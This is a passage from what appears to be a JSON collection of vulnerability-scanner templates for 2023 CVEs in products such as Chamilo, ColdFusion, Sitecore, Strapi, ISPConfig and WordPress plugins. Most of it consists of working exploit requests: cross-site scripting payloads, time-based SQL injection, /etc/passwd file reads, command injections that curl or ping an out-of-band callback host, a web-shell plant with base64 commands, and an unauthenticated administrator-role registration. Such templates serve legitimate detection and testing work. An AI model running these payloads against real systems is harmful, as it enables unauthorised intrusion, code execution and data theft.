Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"word","part":"body","words":["PHPJabbers"],"case-insensitive":true,"internal":true}]},{"method":"GET","path":["{{BaseURL}}/preview.php?theme=theme10dnel8%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3Eko0so"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["theme=theme10dnel8\"><script>alert(document.domain)</script>ko0"]},{"type":"word","part":"content_type","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-3368","info":{"name":"Chamilo LMS <= v1.11.20 Unauthenticated Command Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/main/webservices/additional_webservices.php"],"headers":{"Content-Type":"application/xml"},"body":"<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:ns1=\"{{BaseURL}}\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:ns2=\"http://xml.apache.org/xml-soap\" xmlns:SOAP-ENC=\"http://schemas.xmlsoap.org/soap/encoding/\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\n  <SOAP-ENV:Body>\n    <ns1:wsConvertPpt>\n      <param0 xsi:type=\"ns2:Map\">\n        <item>\n          <key xsi:type=\"xsd:string\">file_data</key>\n          <value xsi:type=\"xsd:string\"></value>\n        </item>\n        <item>\n          <key xsi:type=\"xsd:string\">file_name</key>\n          <value xsi:type=\"xsd:string\">$(curl http://{{interactsh-url}}/)</value>\n        </item>\n        <item>\n          <key xsi:type=\"xsd:string\">service_ppt2lp_size</key>\n          <value xsi:type=\"xsd:string\">720x540</value>\n        </item>\n      </param0>\n    </ns1:wsConvertPpt>\n  </SOAP-ENV:Body>\n</SOAP-ENV:Envelope>\n","matchers-condition":"and","matchers":[{"type":"status","status":[200]},{"type":"word","words":["wsConvertPptResponse"],"part":"body"},{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2023-37645","info":{"name":"EyouCms v1.6.3 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/data/model/custom_model_path/recruit.filelist.txt"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["application/admin/","template/pc/"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-26067","info":{"name":"Lexmark Printers - Command Injection","severity":"high"},"requests":[{"raw":["POST /cgi-bin/fax_change_faxtrace_settings HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nContent-Length: 49\n\nFT_Custom_lbtrace=$({{cmd}})\n"],"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, 'dns')","contains(body, 'Fax Trace Settings')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-44352","info":{"name":"Adobe Coldfusion - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/{{string}}\"><img src=a onerror=alert(document.domain)>/..CFIDE/wizards/common/_authenticatewizarduser.cfm","{{BaseURL}}//{{string}}\"><img src=a onerror=alert(document.domain)>/..CFIDE/wizards/common/_authenticatewizarduser.cfm","{{BaseURL}}/{{string}}\"><img src=a onerror=alert(document.domain)>/..CFIDE/administrator/index.cfm","{{BaseURL}}//{{string}}\"><img src=a onerror=alert(document.domain)>/..CFIDE/administrator/index.cfm","{{BaseURL}}/{{string}}%22>%3Cscript%3Ealert(document.domain)%3C/script%3E/..CFIDE/administrator/index.cfm","{{BaseURL}}//{{string}}%22>%3Cscript%3Ealert(document.domain)%3C/script%3E/..CFIDE/administrator/index.cfm","{{BaseURL}}/{{string}}%22>%3Cscript%3Ealert(document.domain)%3C/script%3E/..CFIDE/wizards/common/_authenticatewizarduser.cfm","{{BaseURL}}//{{string}}%22>%3Cscript%3Ealert(document.domain)%3C/script%3E/..CFIDE/wizards/common/_authenticatewizarduser.cfm"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["action=\"/{{string}}\"><img src=a onerror=alert(document.domain)>","\"{{string}}\"><script>alert(document.domain)</script>"],"condition":"or"},{"type":"dsl","dsl":["contains(body, 'ColdFusion')","contains(header, 'text/html')"],"condition":"and"}]}]},{"id":"CVE-2023-35813","info":{"name":"Sitecore - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /sitecore_xaml.ashx/-/xaml/Sitecore.Xaml.Tutorials.Styles.Index HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n__ISEVENT=1&__SOURCE=&__PARAMETERS=ParseControl(\"{{url_encode(payload)}}\")\n"],"matchers":[{"type":"dsl","dsl":["contains(content_type, '{{string}}')","contains_all(body, 'commands', 'command', 'value')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-0900","info":{"name":"AP Pricing Tables Lite <= 1.1.6 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=ap-pricing-tables-lite&message=1 HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: XMLHttpRequest\nContent-Type: application/x-www-form-urlencoded\n\naction=backend_ajax&_action=copy_table&table_id=1+AND+(SELECT+2035+FROM+(SELECT(SLEEP(10)))A)&_wpnonce={{nonce}}\n"],"matchers":[{"type":"dsl","dsl":["duration_3>=5","status_code_3 == 200","contains(body_3, \"Security check\")","contains(body_2, \"ap-pricing-tables-lite\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","part":"body","group":1,"regex":["_wpnonce=([0-9a-z]+)\">Log Out"],"internal":true}]}]},{"id":"CVE-2023-33568","info":{"name":"Dolibarr Unauthenticated Contacts Database Theft","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/public/ticket/ajax/ajax.php?action=getContacts&email=%"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"database_name\":","\"database_user\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-6786","info":{"name":"Payment Gateway for Telcell < 2.0.4 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin.php?page=wc-settings&action=redirect_telcell_form&api_url=https://oast.me"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.me.*$"]}]}]},{"id":"CVE-2023-2252","info":{"name":"Directorist < 7.5.4 - Local File Inclusion","severity":"low"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/edit.php?post_type=at_biz_dir&page=tools&step=2&file=%2Fetc%2Fpasswd&delimiter=%3B HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-28343","info":{"name":"Altenergy Power Control Software C1.2.5 - Remote Command Injection","severity":"critical"},"requests":[{"raw":["POST /index.php/management/set_timezone HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nAccept-Encoding: gzip, deflate\nReferer: {{RootURL}}/index.php/management/datetime\n\ntimezone=`nslookup {{interactsh-url}}`\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["Time Zone updated successfully"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-1880","info":{"name":"Phpmyfaq v3.1.11 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?action=send2friend&artlang=aaaa%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"phpmyfaq\") && contains(body, \"<script>alert(document.domain)</script>\")","contains(content_type, \"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2023-24489","info":{"name":"Citrix ShareFile StorageZones Controller - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /documentum/upload.aspx?parentid={{url_encode(padding)}}&raw=1&unzip=on&uploadid={{fileName}}\\..\\..\\..\\cifs&filename={{fileName}}.aspx HTTP/1.1\nHost: {{Hostname}}\n\n<%@ Page Language=\"C#\" Debug=\"true\" Trace=\"false\" %>\n<script Language=\"c#\" runat=\"server\">\nvoid Page_Load(object sender, EventArgs e)\n{\n    Response.Write(\"{{randstr}}\");\n}\n</script>\n"],"payloads":{"padding":"helpers/payloads/citrix_paddings.txt"},"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["body == \"ERROR: The method or operation is not implemented.\"","status_code == 200"],"condition":"and"}],"extractors":[{"type":"dsl","dsl":["BaseURL+ \"/cifs/\" + fileName + \".aspx\""]}]}]},{"id":"CVE-2023-4450","info":{"name":"JeecgBoot JimuReport - Template injection","severity":"critical"},"requests":[{"raw":["POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n  \"sql\": \"<#assign ex=\\\"freemarker.template.utility.Execute\\\"?new()>${ex(\\\"curl http://{{interactsh-url}}\\\")} \",\n  \"type\": \"0\"\n}\n"],"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, \"http\") || contains(interactsh_protocol, \"dns\")","status_code == 200","contains(content_type,\"application/json\")","contains(body,\"success\")"],"condition":"and"}]}]},{"id":"CVE-2023-35843","info":{"name":"NocoDB version <= 0.106.1 - Arbitrary File Read","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/download/{{repeat('..%2F', 5)}}etc%2Fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-25346","info":{"name":"ChurchCRM 4.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /session/begin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nUser={{username}}&Password={{password}}\n","GET /v2/person/not-found?id=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"<script>alert(document.domain)</script>\")","contains(body_2, \"ChurchCRM\")"],"condition":"and"}]}]},{"id":"CVE-2023-6020","info":{"name":"Ray Static File - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/static/js/../../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"header","words":["application/octet-stream","aiohttp"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-3843","info":{"name":"mooDating 1.2 - Cross-site scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/matchmakings/questiontmili%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.domain)%3Ew71ch?number="],"matchers":[{"type":"dsl","dsl":["status_code == 404","contains(content_type, \"text/html\")","contains(body, \"><img src=a onerror=alert(document.domain)>w71ch\") && contains(body, \"mooDating\")"],"condition":"and"}]}]},{"id":"CVE-2023-0669","info":{"name":"Fortra GoAnywhere MFT - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /goanywhere/lic/accept HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded\n\nbundle={{concat(url_encode(base64(aes_cbc(base64_decode(generate_java_gadget(\"dns\", \"http://{{interactsh-url}}\", \"base64\")), base64_decode(\"Dmmjg5tuz0Vkm4YfSicXG2aHDJVnpBROuvPVL9xAZMo=\"), base64_decode(\"QUVTL0NCQy9QS0NTNVBhZA==\")))), '$2')}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["GoAnywhere"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2023-33831","info":{"name":"FUXA - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /api/runscript HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"headers\": {\"normalizedNames\": {}, \"lazyUpdate\": \"null\"}, \"params\": {\"script\": {\"parameters\": [{\"name\": \"ok\", \"type\": \"tagid\", \"value\": \"\"}], \"mode\": \"\", \"id\": \"\", \"test\": \"true\", \"name\": \"ok\", \"outputId\": \"\", \"code\": \"require('child_process').exec('id > ./_images/{{filename}}')\"}}}\n","GET /_images/{{filename}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["Script OK:"]},{"type":"word","part":"body_2","words":["uid","gid","groups"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-6505","info":{"name":"Prime Mover < 1.9.3 - Sensitive Data Exposure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/uploads/prime-mover-export-files/1/"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Index of /wp-content/uploads/prime-mover-export-files/1",".wprime"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-39598","info":{"name":"IceWarp Email Client - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webmail/?mid={{to_lower(rand_base(4))}}\"><img src=x onerror=confirm(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","words":["<img src=x onerror=confirm(document.domain)>","icewarp"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-1080","info":{"name":"WordPress GN Publisher <1.5.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options-general.php?page=gn-publisher-settings&tab=%22%2F+onmouseover%3Dalert%28document.domain%29%3B%2F%2F HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"/ onmouseover=alert(document.domain);//\")","contains(body_2, \"GN Publisher\")"],"condition":"and"}]}]},{"id":"CVE-2023-30868","info":{"name":"Tree Page View Plugin < 1.6.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/edit.php?page=cms-tpv-page-post&post_type=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(content_type_2, \"text/html\")","contains(body_2, \"%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\") && contains(body_2, \"CMS Tree Page View\")","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2023-43187","info":{"name":"NodeBB XML-RPC Request xmlrpc.php - XML Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"dsl","internal":true,"dsl":["contains(to_lower(body), \"nodebb\")"]}]},{"method":"POST","path":["{{BaseURL}}/xmlrpc.php"],"headers":{"Content-Type":"text/xml"},"body":"<?xml version=\"1.0\"?>\n<methodCall>\n  <methodName>system.listMethods</methodName>\n  <params>\n    <param>\n      <value><?php phpinfo(); ?></value>\n    </param>\n  </params>\n</methodCall>\n","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>phpinfo()</title>","PHP Version"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-46818","info":{"name":"ISPConfig - PHP Code Injection","severity":"high"},"requests":[{"raw":["POST /login/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&s_mod=login\n"],"matchers":[{"type":"dsl","dsl":["contains(header, \"Set-Cookie\")","status_code == 302"],"condition":"and"}]},{"raw":["POST /admin/language_edit.php HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nlang=en&module=help&lang_file={{lang-file}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(response, \"_csrf_id\", \"_csrf_key\")","status_code == 200"],"condition":"and"}],"extractors":[{"type":"regex","name":"lang_file_location","group":1,"regex":["<legend>Language file: (.*)</legend>"],"internal":true},{"type":"regex","name":"csrf_id","group":1,"regex":["_csrf_id\" value=\"(.*)\" />"],"internal":true},{"type":"regex","name":"csrf_key","group":1,"regex":["_csrf_key\" value=\"(.*)\" />"],"internal":true}]},{"raw":["POST /admin/language_edit.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlang=en&module=help&lang_file={{lang-file}}&_csrf_id={{csrf_id}}&_csrf_key={{csrf_key}}&records[%5C]={{payload-url-enc}}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200"]}]},{"raw":["GET /admin/{{websh-file}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nC: {{base64('\u00a7echo-cmd\u00a7')}}\n"],"matchers-condition":"and","matchers":[{"type":"status","status":[200]},{"type":"word","words":["{{echo-cmd-hash}}"]}]},{"raw":["GET /admin/{{websh-file}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nC: {{base64('rm \u00a7lang_file_location\u00a7')}}\n"],"matchers":[{"type":"status","status":[200]}]},{"raw":["GET /admin/{{websh-file}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nC: {{base64('rm \u00a7websh-file\u00a7')}}\n"],"matchers":[{"type":"status","status":[200]}]}]},{"id":"CVE-2023-3479","info":{"name":"Hestiacp <= 1.7.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/templates/pages/debug_panel.php?id={{randstr}}\"><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["debug-panel","<script>alert(document.domain)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-41621","info":{"name":"Emlog Pro v2.1.14 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /admin/store.php?\"onmouseover='alert(document.domain)'bad=\" HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"response","words":["onmouseover='alert(document.domain)'bad=","emlog"],"condition":"and","case-insensitive":true},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-45852","info":{"name":"Viessmann Vitogate 300 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /cgi-bin/vitogate.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"method\":\"put\",\"form\":\"form-4-8\",\"session\":\"\",\"params\":{\"ipaddr\":\"{{randstr}};cat /etc/passwd\"}}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains_all(header, \"application/json\")","contains_all(body, \"traceroute: {{randstr}}: Unknown host\", \"daemon:x:1:1:\")"],"condition":"and"}]}]},{"id":"CVE-2023-5003","info":{"name":"Active Directory Integration WP Plugin < 4.1.10 - Log Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/ldap-authentication-report.csv"],"matchers-condition":"and","matchers":[{"type":"word","words":["ID","USERNAME","TIME","LDAP STATUS"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-22621","info":{"name":"Strapi Versions <=4.5.5 - SSTI to Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /admin/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"email\":\"{{email}}\",\"password\":\"{{password}}\"}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains_all(body, \"token\",\"isActive\")","contains(content_type, \"application/json\")"],"condition":"and","internal":true}],"extractors":[{"type":"json","part":"body","name":"token","json":[".data.token"],"internal":true}]},{"raw":["PUT /users-permissions/advanced HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Bearer {{token}}\nContent-Type: application/json\n\n{\"unique_email\":true,\"allow_register\":true,\"email_confirmation\":true,\"email_reset_password\":null,\"email_confirmation_redirection\":\"{{RootURL}}\",\"default_role\":\"authenticated\"}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains_all(body, \"ok\",\"true\")","contains(content_type, \"application/json\")"],"condition":"and","internal":true}]},{"raw":["PUT /users-permissions/email-templates HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Bearer {{token}}\nContent-Type: application/json\n\n{\n  \"email-templates\": {\n    \"reset_password\": {\n      \"display\": \"Email.template.reset_password\",\n      \"icon\": \"sync\",\n      \"options\": {\n        \"from\": {\n          \"name\": \"Administration Panel\",\n          \"email\": \"no-reply@strapi.io\"\n        },\n        \"response_email\": \"\",\n        \"object\": \"Reset password\",\n        \"message\": \"<p>We heard that you lost your password. Sorry about that!</p>\\n\\n<p>But dont worry! You can use the following link to reset your password:</p>\\n<p><%= URL %>?code=<%= TOKEN %></p>\\n\\n<p>Thanks.</p>\"\n      }\n    },\n    \"email_confirmation\": {\n      \"display\": \"Email.template.email_confirmation\",\n      \"icon\": \"check-square\",\n      \"options\": {\n        \"from\": {\n          \"name\": \"Administration Panel\",\n          \"email\": \"no-reply@strapi.io\"\n        },\n        \"response_email\": \"\",\n        \"object\": \"Account confirmation\",\n        \"message\": \"<%= `${ process.binding('spawn_sync').spawn({\\\"file\\\":\\\"/bin/sh\\\",\\\"args\\\":[\\\"/bin/sh\\\",\\\"-c\\\",\\\"curl {{interactsh-url}}\\\"],\\\"stdio\\\":[{\\\"readable\\\":1,\\\"writable\\\":1,\\\"type\\\":\\\"pipe\\\"},{\\\"readable\\\":1,\\\"writable\\\":1,\\\"type\\\":\\\"pipe\\\"/*<>%=*/}]}).output }` %>\\n\\n<p><%= URL %>?confirmation=<%= CODE %></p>\\n\\n<p>Thanks.</p>\"\n      }\n    }\n  }\n}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains_all(body, \"ok\",\"true\")","contains(content_type, \"application/json\")"],"condition":"and","internal":true}]},{"raw":["POST /api/auth/local/register HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n    \"email\": \"{{address}}\",\n    \"username\": \"{{randstr_1}}\",\n    \"password\": \"{{randstr_2}}\"\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["ApplicationError"]},{"type":"word","part":"content_type","words":["application/json"]}]}]},{"id":"CVE-2023-32117","info":{"name":"Integrate Google Drive <= 1.1.99 - Missing Authorization via REST API Endpoints","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-json/igd/v1/get-users-data"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"username\":","\"name\":","\"email\":","\"role\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-27034","info":{"name":"Jms Blog - SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":3,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(tolower(body), \"jmsblog\")"],"condition":"and","internal":true}]},{"raw":["@timeout: 20s\nPOST /module/jmsblog/index.php?action=submitComment&controller=post&fc=module&module=jmsblog&post_id=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----------YWJkMTQzNDcw\nX-Requested-With: XMLHttpRequest\n\n------------YWJkMTQzNDcw\nContent-Disposition: form-data; name=\"comment\"\n\n555\n------------YWJkMTQzNDcw\nContent-Disposition: form-data; name=\"customer_name\"\n\n\n------------YWJkMTQzNDcw\nContent-Disposition: form-data; name=\"email\"\n\n0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z\n------------YWJkMTQzNDcw\nContent-Disposition: form-data; name=\"post_id\"\n\n1\n------------YWJkMTQzNDcw\nContent-Disposition: form-data; name=\"post_id_comment_reply\"\n\n1\n------------YWJkMTQzNDcw\nContent-Disposition: form-data; name=\"submitComment\"\n\nsubmitComment=\n------------YWJkMTQzNDcw--\n"],"host-redirects":true,"max-redirects":3,"matchers":[{"type":"dsl","dsl":["duration>=6"]}]}]},{"id":"CVE-2023-3460","info":{"name":"Ultimate Member < 2.6.7 - Unauthenticated Privilege Escalation","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/ultimate-member/readme.txt HTTP/1.1\nHost: {{Hostname}}\n","GET /index.php/register/?{{version}} HTTP/1.1\nHost: {{Hostname}}\n","GET {{path}} HTTP/1.1\nHost: {{Hostname}}\n","POST {{path}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser_login-{{formid}}={{username}}&user_email-{{formid}}={{email}}&user_password-{{formid}}={{password}}&confirm_user_password-{{formid}}={{password}}&first_name-{{formid}}={{firstname}}&last_name-{{formid}}={{lastname}}&form_id={{formid}}&um_request=&_wpnonce={{wpnonce}}&wp_c%C3%A0pabilities%5Badministrator%5D=1\n"],"matchers":[{"type":"dsl","dsl":["contains(to_lower(body_1), \"ultimate member\")","regex(\"wordpress_logged_in_[a-z0-9]{32}\", header_4)","status_code_4 == 302"],"condition":"and"}],"extractors":[{"type":"regex","name":"path","part":"location_2","group":1,"regex":["([a-z:/.]+)"],"internal":true},{"type":"regex","name":"version","part":"body_1","group":1,"regex":["(?i)Stable.tag:\\s?([\\w.]+)"],"internal":true},{"type":"regex","name":"formid","part":"body_3","group":1,"regex":["name=\"form_id\" id=\"form_id_([0-9]+)\""],"internal":true},{"type":"regex","name":"wpnonce","part":"body_3","group":1,"regex":["name=\"_wpnonce\" value=\"([0-9a-z]+)\""],"internal":true},{"type":"dsl","dsl":["\"WP_USERNAME: \"+ username","\"WP_PASSWORD: \"+ password"]}]}]},{"id":"CVE-2023-26035","info":{"name":"ZoneMinder Snapshots - Command Injection","severity":"critical"},"requests":[{"raw":["GET /index.php HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","name":"csrf_token","group":1,"regex":["csrfMagicToken = \\\"(key:[a-f0-9]{40},\\d+)"],"internal":true}]},{"raw":["POST /index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nview=snapshot&action=create&monitor_ids[0][Id]=;ping+{{interactsh-url}}&__csrf_magic={{csrf_token}}\n"],"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, \"dns\")"]}]}]},{"id":"CVE-2023-48084","info":{"name":"Nagios XI < 5.11.3 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnsp={{nsp}}&page=auth&debug=&pageopt=login&username={{username}}&password={{password}}&loginButton=\n","@timeout: 15s\nGET /nagiosxi/index.php/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=(SELECT+CASE+WHEN+1=1+THEN+sleep(5)+ELSE+sleep(0)+END+) HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"skip-variables-check":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration_3>=5","contains(body_3, \"Home Dashboard</a>\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nsp","part":"body","group":1,"regex":["name=\"nsp\" value=\"(.*)\">"],"internal":true}]}]},{"id":"CVE-2023-3847","info":{"name":"MooDating 1.2 - Cross-Site scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/users/viewi1omd%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3el43yn/108?tab=activity"],"matchers":[{"type":"dsl","dsl":["status_code == 404","contains(content_type, \"text/html\")","contains_all(body, \"><img src=a onerror=alert(document.domain)>\",\"mooDating\")"],"condition":"and"}]}]},{"id":"CVE-2023-0099","info":{"name":"Simple URLs < 115 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-content/plugins/simple-urls/admin/assets/js/import-js.php?search=%3C/script%3E%3Csvg/onload=alert(document.domain)%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body, \"</script><svg/onload=alert(document.domain)>\")","contains(body_2, \"search_term\")"],"condition":"and"}]}]},{"id":"CVE-2023-0297","info":{"name":"PyLoad 0.5.0 - Pre-auth Remote Code Execution 